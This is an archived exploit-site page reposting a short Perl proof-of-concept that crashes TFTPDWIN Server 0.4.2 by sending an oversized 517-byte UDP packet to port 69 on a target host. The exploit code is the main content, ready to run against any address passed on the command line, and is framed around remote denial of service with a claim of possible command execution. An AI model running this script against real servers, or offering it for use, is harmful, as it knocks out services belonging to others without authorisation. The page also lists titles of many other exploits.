首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
TFTPDWIN Server 0.4.2 (UDP) Denial of Service Exploit
来源:umesh_345@yahoo.com 作者:Umesh 发布时间:2007-03-09  
#!/usr/bin/perl
#
#                            TFTPDWIN Server UDP DOS 0.4.2 POC
#             written By : Umesh Wanve (umesh_345@yahoo.com)
#
#-------------------------------------------------------------------------------

# TFTPDWIN Server is a Freeware TFTP server for Windows 9x/NT/XP.
# (http://www.tftpserver.prosysinfo.com.pl)
# A vulnerability has been identified in TFTP Server TFTPDWIN Server v0.4.2, which
# could be exploited by remote or local attackers to execute arbitrary commands
# or cause a denial of service. This flaw is when attacker sends UDP packet of length more than 516 bytes

#

#----------------------------Start of Code-------------------------------------



use IO::Socket;
use strict;

my($socket) = "";

if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],

PeerPort => "69",

Proto    => "UDP"))
{
               
                 print $socket "A" x 517;
                 sleep(1);

               
                 close($socket);
}
else
{
                 print "Cannot connect to $ARGV[0]:69\n";
}

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·PHP 4.4.6 crack_opendict() Loc
·Rediff Toolbar ActiveX Control
·Adobe Reader plug-in AcroPDF.d
·Snort 2.6.1.1/2.6.1.2/2.7.0 (f
·PHP COM extensions (inconsiste
·PHP < 4.4.5 / 5.2.1 (shmop) SS
·PHP < 4.4.5 / 5.2.1 (shmop Fun
·PHP <= 5.2.1 substr_compare()
·NukeSentinel <= 2.5.06 (mysql
·Winamp <= 5.12 (Crafted PLS) R
·SonicMailer Pro <= 3.2.3 (inde
·Macromedia 10.1.4.20 SwDir.dll
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved